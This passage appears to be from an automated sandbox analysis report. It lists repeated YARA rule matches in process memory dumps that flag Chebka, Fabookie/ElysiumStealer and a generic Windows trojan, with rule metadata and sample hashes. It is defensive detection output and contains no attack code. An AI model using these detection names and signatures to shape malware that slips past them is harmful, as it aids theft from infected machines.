        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Fabookie author = ditekSHen, description = Detects Fabookie / ElysiumStealer
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000009.00000003.424592109.00000244FE303000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
